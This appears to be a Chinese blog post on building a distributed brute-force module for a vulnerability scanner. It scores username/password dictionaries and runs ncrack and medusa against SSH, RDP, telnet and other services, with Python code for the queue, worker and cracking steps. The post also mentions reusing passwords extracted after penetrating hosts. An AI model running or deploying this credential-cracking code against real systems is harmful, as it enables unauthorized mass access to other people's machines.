前言
在研发漏洞扫描器的弱口令破解模块时,发现传统的通过字典遍历用户名密码的算法效率过低,当需要大批量高速爆破时,难以满足此类需求,因此需要引入新的算法,本文以一个分布式扫描器的爆破模块为例,演示如何进行高效快速的分布式爆破。
传统方法
传统的密码穷举
效率非常低,而且还有可能触发报警
king of zombie
koz (king of zombie) 算法,即首先按照多种算法对用户名密码字典组合进行评分,然后用评分最高的组合去淘汰僵尸主机。
流程
- 上游push ncrack任务到队列
- koz 节点开始瓜分队列任务,保存为任务列表 (根据cpu,网速来分配多少任务) 。
- 使用账号密码字典爆破来遍历任务列表,hit中 即从列表中淘汰(字典按评分优先级排序)。
- 说明
字典评分按照爆破成功记录次数和蜜罐记录次数来计算,master 端实时更新,koz node 每日定时更新。
淘汰机制具体为先去除一大部分普遍存在的弱口令,例如某一批次中,第一次使用 ubnt/ubnt 来爆破ssh服务,就能淘汰 15% 的任务,第二次使用 root/123456 能淘汰 3% 。
表结构
pw_koz_level
| 列 | 类型 | 注释 |
|---|---|---|
| id | int(11) | 自动增量 |
| username | varchar(255) | 用户名 |
| password | varchar(255) | 密码 |
| type | varchar(255) | 类型 |
| score | int(11) | 评分 |
更新算法
目前数据来源有四个
第一个 扫描器爆破成功记录 score 值为 10
第二个 蜜罐记录 score 值 为 1
第三个 渗透进去提取到的有效密码(例如windows 明文) ,score 10
第四个 收集的各种工具扫描字典 score 值为 1
扫描的时候工具score 值来排序,命中一次之后+10
例如如下字典列表
master
推送任务之后使用无状态扫描工具扫描服务和指纹识别
koz node
KozTask 类来保存本地任务队列,接收处的代码为
def pop_member(self):
while self.len() > 0:
str_member=self.pop()
koz_member=ast.literal_eval(str_member)
self.list_member[str(koz_member['name'])].append(koz_member)
util.log("pop koz_member done count:%d" % (self.count()),2,'koztask')
本地队列处理完毕之后,开始foreach 循环用户名密码组合(根据score 大小优先级)
koz_levels=get_koz_level()
for koz_level in koz_levels :
koz_queue.queue.clear()
#member={'name': 'ssh', 'task_id': 1124, 'url': '', 'host': '168.167.45.250', 'version': '', 'type': 'service', 'port': 22}
#ncrack.scan(member,koz_level)
#break
try :
for member in koz_task.list_member[koz_level['type']] :
koz_queue.put({'member':member,'level':koz_level})
work_manager = WorkManager(koz_queue, config.koz_thread) # thread
work_manager.wait_allcomplete()
except Exception, e:
util.log("error info:"+str(e),3,'koz_node')
util.log('koz_member len:%d' % (koz_task.count()),1,'koz_node')
当扫描出来结果时,直接把它从 koz_member 队列里面remove 掉,如此循环往复,直到跑完所有的密码。
remove
def run(self):
while 1:
if self.work_queue.empty() == True:
break
task = self.work_queue.get(block=False)
if ncrack.scan(task['member'],task['level']) != False :
koz_type=task['member']['name']
koz_task.list_member[koz_type].remove(task['member'])
爆破算法
负责爆破的为ncrack 模块,调用的爆破工具有 medusa,ncrack。
部分实现
def scan(target,level):
if target['name'] == 'ms-wbt-server' or target['name'] == 'telnet' :
str_command = "ncrack --user %s --pass %s %s:%d " % (level['username'],level['password'],target['host'],target['port'])
str_ret=str(sys_exec(['ncrack', '--user',level['username'], '--pass', level['password'], target['host']+':'+ str(target['port'])]))
else :
str_command = "medusa -u %s -p %s -h %s -n %d -M %s" % (level['username'], level['password'], target['host'], target['port'], target['name'])
str_ret=str(sys_exec(['medusa','-u',level['username'],'-p',level['password'],'-h',target['host'],'-n',str(target['port']),'-M',target['name']]))
util.log(str_command, 2, 'ncrack')
#need change
if 'ACCOUNT FOUND' in str_ret or 'credentials' in str_ret:
str_data='[%s] %s %s:%s' % (target['name'],target['host'],level['username'],level['password'])
util.log('ncrack taskid:%d target:%s service:%s succeed' % (target['task_id'], target['host'], target['name']), 1, 'ncrack')
return report(target,str_data)
else :
return False
爆破结果
总览
[图片上传失败...(image-5f2cbd-1532176841772)]
图文分析
部分结果一览
